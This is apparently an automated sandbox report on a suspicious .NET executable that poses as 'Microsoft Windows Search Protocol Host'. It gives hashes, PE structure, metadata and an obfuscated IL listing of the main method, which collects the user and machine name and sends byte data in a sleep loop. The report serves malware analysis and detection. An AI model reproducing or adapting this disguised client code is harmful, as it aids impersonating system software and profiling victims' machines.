Suspicious
Suspect

237c617acd3dee5041fbc6318389429d

PE Executable | MD5: 237c617acd3dee5041fbc6318389429d | Size: 472.38 KB | application/x-dosexec

Summary by MalvaGPT
Characteristics

Symbol Obfuscation Score

Very high

Hash: Hash Value
MD5: 237c617acd3dee5041fbc6318389429d
Sha1: 9a99556f0d1a2567764d1f2feafdfe35ca79c76f
Sha256: d051a2248953ef9e62d136641d3fba9ae22846ea8f00f8823e18b3e7c5c219b7
Sha384: fb33875b7ccaff2b6de67335e7e90022b8c7ae957c77271a1bcdf6ff35542667683a5e8b95db83c52401d2fb6e57437f
Sha512: 9e4a4c273d9cb7a77b873501cb8e719685b2fd1c5ed1d99e802e83124ab0265409670055031b484439055b385d10ef1b8714dacf50debb2fd2a3340ea008a598
SSDeep: 6144:pAW/pRiPQ+u74n4z88IUPimODSsqLggjz2tLlpj46y2l40+Sp9ua587LvfP2wFbD:egRiu7jzrpPydjgjSm0+SbjSnnX+u
TLSH: 7BA43A147FA98E08D550293E429E5608CBEAD1F121326307370AEFA59D45DDEEE2C3DB

PeID

.NET executable
Microsoft Visual C# / Basic .NET
Microsoft Visual C# / Basic.NET / MS Visual Basic 2005 - ASL
Microsoft Visual C# v7.0 / Basic .NET
Microsoft Visual Studio .NET
File Structure
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rsrc
.reloc
Resources
RT_ICON
ID:0001
ID:0
RT_GROUP_CURSOR4
ID:0001
ID:0
RT_VERSION
ID:0001
ID:0
RT_MANIFEST
ID:0001
ID:0
.Net Resources
ntop5tf66jvj1a7t5fxe
amchz67ini
Information
Module Name: Microsoft Windows Search Protocol Host
Full Name: Microsoft Windows Search Protocol Host
EntryPoint: System.Void gjrXvOxdPNi.FYRwYyZPkLSByCjEDoMFoyLcq::voPMdSqNotFUQGLyrloYYh(System.String[])
Scope Name: Microsoft Windows Search Protocol Host
Scope Type: ModuleDef
Kind: Windows
Runtime Version: v4.0.30319
Tables Header Version: 512
WinMD Version: <null>
Assembly Name: Microsoft Windows Search Protocol Host
Assembly Version: 1.0.0.0
Assembly Culture: <null>
Has PublicKey: False
PublicKey Token: <null>
Target Framework: .NETFramework,Version=v4.7.2
Total Strings: 456
Main Method: System.Void gjrXvOxdPNi.FYRwYyZPkLSByCjEDoMFoyLcq::voPMdSqNotFUQGLyrloYYh(System.String[])
Main IL Instruction Count: 182

Main IL

ldc.r8 2038 stloc V_3 br IL_004F: br IL_0012 nop <null> ldloc V_3 ldc.r8 2038 ceq <null> brfalse IL_0035: nop nop <null> ldc.r8 2049 stloc V_3 nop <null> ldloc V_3 ldc.r8 2049 ceq <null> brfalse IL_004F: br IL_0012 br IL_0054: call System.Void gjrXvOxdPNi.tpuCfQSWXJdg::jlpvYJXRplea() br IL_0012: nop call System.Void gjrXvOxdPNi.tpuCfQSWXJdg::jlpvYJXRplea() call System.Void gjrXvOxdPNi.WlbOHFCPSUBakbYvpyMsKhThF::iYJorPDEIRhovxe() ldsfld System.String gjrXvOxdPNi.tpuCfQSWXJdg::VSvmQrRcpWJufKlOor call System.String gTLVaxELikWw.RLCYTEceaNFLVCOPnTIoqP::xBhEsbcFBSQacToVyspyCKgY() call System.String HwDwBHqbPq.HzVBJIixYDaxHKqGvzIfWoD::ppSGEhibTeZcBUPGf(System.String) call System.Boolean System.String::op_Equality(System.String,System.String) brfalse IL_007C: ldsfld System.String gjrXvOxdPNi.tpuCfQSWXJdg::SXVFXThaLrkkePDGBiNvj call System.Void JtfhJhplVLbZ.bVywbtvQcBGnqEBomSFDx::mpXZpmcuQdakCEdBLXpQNmjU() ldsfld System.String gjrXvOxdPNi.tpuCfQSWXJdg::SXVFXThaLrkkePDGBiNvj call System.Boolean HwDwBHqbPq.ZsYBrIXQtTtGdFNohOovtHoqM::FCHdkDyAfNPxVMIipNP(System.String) brtrue IL_0090: call System.Void HwDwBHqbPq.wenXjnqDzVJZSdxrbazBvr::lCsEYvuIsRqpeCpYH() leave IL_02BE: ret call System.Void HwDwBHqbPq.wenXjnqDzVJZSdxrbazBvr::lCsEYvuIsRqpeCpYH() call System.Void SlfqvNMcCJRvxssuj.aKfMoAJHWbwEZ::xkDbplOjLFaEjTHWcpO() ldsfld gjrXvOxdPNi.btGfdTiSbIilLw gjrXvOxdPNi.FYRwYyZPkLSByCjEDoMFoyLcq::jWArgloWYa ldfld System.Boolean gjrXvOxdPNi.btGfdTiSbIilLw::ldwgIaATEbgfTmrZSLejvrPon brtrue IL_02A9: call System.Int32 gTLVaxELikWw.RLCYTEceaNFLVCOPnTIoqP::JVostcYQJqHEPTenBh() ldsfld System.String gjrXvOxdPNi.tpuCfQSWXJdg::BzVgFJhRXigDjBVILXxP call System.Int32 gTLVaxELikWw.RLCYTEceaNFLVCOPnTIoqP::ODxuaTkOwKvKNWrQKOee() newarr System.Char dup <null> call System.Int32 gTLVaxELikWw.RLCYTEceaNFLVCOPnTIoqP::dOqBSvzwOAWMa() call System.Int32 gTLVaxELikWw.RLCYTEceaNFLVCOPnTIoqP::XlljRgRBYIpsjjHM() stelem.i2 <null> callvirt System.String[] System.String::Split(System.Char[]) stloc V_0 ldloc V_0 
ldsfld System.Random SlfqvNMcCJRvxssuj.aKfMoAJHWbwEZ::jddXvINVvzhyVNaJMzu ldloc V_0 ldlen <null> conv.i4 <null> callvirt System.Int32 System.Random::Next(System.Int32) ldelem.ref <null> call System.Int32 gTLVaxELikWw.RLCYTEceaNFLVCOPnTIoqP::qaVlpHsHYkRhJYynC() newarr System.Char dup <null> call System.Int32 gTLVaxELikWw.RLCYTEceaNFLVCOPnTIoqP::eYeNytcpiLaLQpBc() call System.Int32 gTLVaxELikWw.RLCYTEceaNFLVCOPnTIoqP::lEjhesbsvAUOjqFhOdn() stelem.i2 <null> callvirt System.String[] System.String::Split(System.Char[]) stloc V_1 ldloc V_1 call System.Int32 gTLVaxELikWw.RLCYTEceaNFLVCOPnTIoqP::dccIzYhhMUcfhtNiTmAfDUCt() ldelem.ref <null> call System.Int32 gTLVaxELikWw.RLCYTEceaNFLVCOPnTIoqP::azVVeBMOiCJc() newarr System.Char dup <null> call System.Int32 gTLVaxELikWw.RLCYTEceaNFLVCOPnTIoqP::iFLugaXohpdWNccHqI() call System.Int32 gTLVaxELikWw.RLCYTEceaNFLVCOPnTIoqP::jAYZMMhTQRyrEFsEuU() stelem.i2 <null> callvirt System.String[] System.String::Split(System.Char[]) stloc V_2 ldsfld gjrXvOxdPNi.btGfdTiSbIilLw gjrXvOxdPNi.FYRwYyZPkLSByCjEDoMFoyLcq::jWArgloWYa callvirt System.Void gjrXvOxdPNi.btGfdTiSbIilLw::LyNPSrwKCt() ldsfld gjrXvOxdPNi.btGfdTiSbIilLw gjrXvOxdPNi.FYRwYyZPkLSByCjEDoMFoyLcq::jWArgloWYa ldloc V_1 call System.Int32 gTLVaxELikWw.RLCYTEceaNFLVCOPnTIoqP::obVTtJryQYjG() ldelem.ref <null> ldloc V_2 ldsfld System.Random SlfqvNMcCJRvxssuj.aKfMoAJHWbwEZ::jddXvINVvzhyVNaJMzu ldloc V_2 ldlen <null> conv.i4 <null> callvirt System.Int32 System.Random::Next(System.Int32) ldelem.ref <null> callvirt System.Void gjrXvOxdPNi.btGfdTiSbIilLw::kxetdDHWqeRVVDJQlbIDO(System.String,System.String) ldsfld gjrXvOxdPNi.btGfdTiSbIilLw gjrXvOxdPNi.FYRwYyZPkLSByCjEDoMFoyLcq::jWArgloWYa ldfld System.Boolean gjrXvOxdPNi.btGfdTiSbIilLw::ldwgIaATEbgfTmrZSLejvrPon brfalse IL_02A9: call System.Int32 gTLVaxELikWw.RLCYTEceaNFLVCOPnTIoqP::JVostcYQJqHEPTenBh() ldsfld gjrXvOxdPNi.btGfdTiSbIilLw gjrXvOxdPNi.FYRwYyZPkLSByCjEDoMFoyLcq::jWArgloWYa call System.Int32 
gTLVaxELikWw.RLCYTEceaNFLVCOPnTIoqP::tjtZJgzizHGWjyYRVXinhUy() newarr System.Object dup <null> call System.Int32 gTLVaxELikWw.RLCYTEceaNFLVCOPnTIoqP::gfPUNQuhLGxVMT() call System.String gTLVaxELikWw.RLCYTEceaNFLVCOPnTIoqP::KMpnZZExMUzEKwmGCTChc() call System.String HwDwBHqbPq.HzVBJIixYDaxHKqGvzIfWoD::ppSGEhibTeZcBUPGf(System.String) stelem.ref <null> dup <null> call System.Int32 gTLVaxELikWw.RLCYTEceaNFLVCOPnTIoqP::NUapUPxKKShvAASJYkgseRfU() call System.String gTLVaxELikWw.RLCYTEceaNFLVCOPnTIoqP::krhYeWxumV() call System.String HwDwBHqbPq.HzVBJIixYDaxHKqGvzIfWoD::ppSGEhibTeZcBUPGf(System.String) stelem.ref <null> call System.Byte[] gjrXvOxdPNi.xaEcrbolGSCqTrszMht::mCfxOgBDEVxRhTIMbr(System.Object[]) callvirt System.Void gjrXvOxdPNi.btGfdTiSbIilLw::aiSIvrCascjkrQEJPSAFyfpO(System.Byte[]) ldsfld gjrXvOxdPNi.btGfdTiSbIilLw gjrXvOxdPNi.FYRwYyZPkLSByCjEDoMFoyLcq::jWArgloWYa ldsfld gjrXvOxdPNi.btGfdTiSbIilLw gjrXvOxdPNi.FYRwYyZPkLSByCjEDoMFoyLcq::jWArgloWYa newobj System.Void nmrftPuzfSWmAsBFqbHBXPu.HWbeMwLTyZOjBzMDhOGnEBX::.ctor(gjrXvOxdPNi.btGfdTiSbIilLw) stfld nmrftPuzfSWmAsBFqbHBXPu.HWbeMwLTyZOjBzMDhOGnEBX gjrXvOxdPNi.btGfdTiSbIilLw::qYlAzfHkvzRENCQmiWJGoIiAe ldsfld gjrXvOxdPNi.btGfdTiSbIilLw gjrXvOxdPNi.FYRwYyZPkLSByCjEDoMFoyLcq::jWArgloWYa ldsfld gjrXvOxdPNi.btGfdTiSbIilLw gjrXvOxdPNi.FYRwYyZPkLSByCjEDoMFoyLcq::jWArgloWYa newobj System.Void JtfhJhplVLbZ.HamusghxzAYNRW::.ctor(gjrXvOxdPNi.btGfdTiSbIilLw) stfld JtfhJhplVLbZ.HamusghxzAYNRW gjrXvOxdPNi.btGfdTiSbIilLw::DhCtOHsLkchDcAYirsHNxc ldsfld gjrXvOxdPNi.btGfdTiSbIilLw gjrXvOxdPNi.FYRwYyZPkLSByCjEDoMFoyLcq::jWArgloWYa call System.Int32 gTLVaxELikWw.RLCYTEceaNFLVCOPnTIoqP::MYLcBDECdVSHfexjVFBg() newarr System.Object dup <null> call System.Int32 gTLVaxELikWw.RLCYTEceaNFLVCOPnTIoqP::tgsxYkgaQwpFGHql() call System.String gTLVaxELikWw.RLCYTEceaNFLVCOPnTIoqP::RiOmScsMdQzo() call System.String HwDwBHqbPq.HzVBJIixYDaxHKqGvzIfWoD::ppSGEhibTeZcBUPGf(System.String) stelem.ref <null> dup <null> call System.Int32 
gTLVaxELikWw.RLCYTEceaNFLVCOPnTIoqP::IOctXfzCtGiJILdoNSrS() call System.Byte[] SlfqvNMcCJRvxssuj.aKfMoAJHWbwEZ::lfoQYbRpNeL() stelem.ref <null> dup <null> call System.Int32 gTLVaxELikWw.RLCYTEceaNFLVCOPnTIoqP::cTYcMYdBYXGxnwmDbVB() ldsfld System.String gjrXvOxdPNi.tpuCfQSWXJdg::KMlMVtYMlQJieeCblMFfOgxhG stelem.ref <null> dup <null> call System.Int32 gTLVaxELikWw.RLCYTEceaNFLVCOPnTIoqP::ufexQIkMRtoyTCgvDRLHWAU() ldsfld System.String gjrXvOxdPNi.tpuCfQSWXJdg::tLuQuiWfKazYdaiafFAL stelem.ref <null> dup <null> call System.Int32 gTLVaxELikWw.RLCYTEceaNFLVCOPnTIoqP::cLUPqklxqZkxobLDnQkf() call System.String System.Environment::get_UserName() call System.String gTLVaxELikWw.RLCYTEceaNFLVCOPnTIoqP::nwDrAqdqKHcxFAv() call System.String HwDwBHqbPq.HzVBJIixYDaxHKqGvzIfWoD::ppSGEhibTeZcBUPGf(System.String) call System.String System.Environment::get_MachineName() call System.String System.String::Concat(System.String,System.String,System.String) stelem.ref <null> dup <null> call System.Int32 gTLVaxELikWw.RLCYTEceaNFLVCOPnTIoqP::HekQqzKKuWuKvVEnVVgH() ldsfld System.String gjrXvOxdPNi.tpuCfQSWXJdg::BOGftROkPSXMcylgcTdvAUtM stelem.ref <null> dup <null> call System.Int32 gTLVaxELikWw.RLCYTEceaNFLVCOPnTIoqP::ItSiHcFHTFPpAUhjyzkbnwC() ldsfld System.String gjrXvOxdPNi.tpuCfQSWXJdg::VlUGIhfYmdOZEI stelem.ref <null> dup <null> call System.Int32 gTLVaxELikWw.RLCYTEceaNFLVCOPnTIoqP::nsGGQSuDYrzkShjXECaReV() ldsfld System.String gjrXvOxdPNi.tpuCfQSWXJdg::ROhHMMrVVLYbwK stelem.ref <null> dup <null> call System.Int32 gTLVaxELikWw.RLCYTEceaNFLVCOPnTIoqP::AXDWWvfELrcvPWzrAKMQIUwR() ldsfld System.String gjrXvOxdPNi.tpuCfQSWXJdg::pkiXlaWTXAAyEAQihJu stelem.ref <null> dup <null> call System.Int32 gTLVaxELikWw.RLCYTEceaNFLVCOPnTIoqP::QNXkVlLRwFjMvYI() ldsfld System.String gjrXvOxdPNi.tpuCfQSWXJdg::hUuPYgtdGlsoqUXGYKOdlmmA stelem.ref <null> dup <null> call System.Int32 gTLVaxELikWw.RLCYTEceaNFLVCOPnTIoqP::notpmTBEKZHSEngamFFiHTp() ldsfld System.String gjrXvOxdPNi.tpuCfQSWXJdg::LKQBpnPirmjTkPIE 
stelem.ref <null> dup <null> call System.Int32 gTLVaxELikWw.RLCYTEceaNFLVCOPnTIoqP::RdSQQeFlEYV() ldsfld System.String gjrXvOxdPNi.tpuCfQSWXJdg::ggdOBrkpzghBMld stelem.ref <null> dup <null> call System.Int32 gTLVaxELikWw.RLCYTEceaNFLVCOPnTIoqP::DbewMSavesNJZIapSal() ldsfld System.String gjrXvOxdPNi.tpuCfQSWXJdg::RdCEqJwBcUdRqCbJjQNfQB stelem.ref <null> dup <null> call System.Int32 gTLVaxELikWw.RLCYTEceaNFLVCOPnTIoqP::ymYIBkofUVOgRzWK() call System.String SlfqvNMcCJRvxssuj.aKfMoAJHWbwEZ::JMYkiDUqRiSZLwWNskd() stelem.ref <null> call System.Byte[] gjrXvOxdPNi.xaEcrbolGSCqTrszMht::mCfxOgBDEVxRhTIMbr(System.Object[]) callvirt System.Void gjrXvOxdPNi.btGfdTiSbIilLw::aiSIvrCascjkrQEJPSAFyfpO(System.Byte[]) call System.Int32 gTLVaxELikWw.RLCYTEceaNFLVCOPnTIoqP::JVostcYQJqHEPTenBh() call System.Void System.Threading.Thread::Sleep(System.Int32) br IL_009A: ldsfld gjrXvOxdPNi.btGfdTiSbIilLw gjrXvOxdPNi.FYRwYyZPkLSByCjEDoMFoyLcq::jWArgloWYa pop <null> leave IL_02BE: ret ret <null>

Characteristics
No malware configuration was found at this point.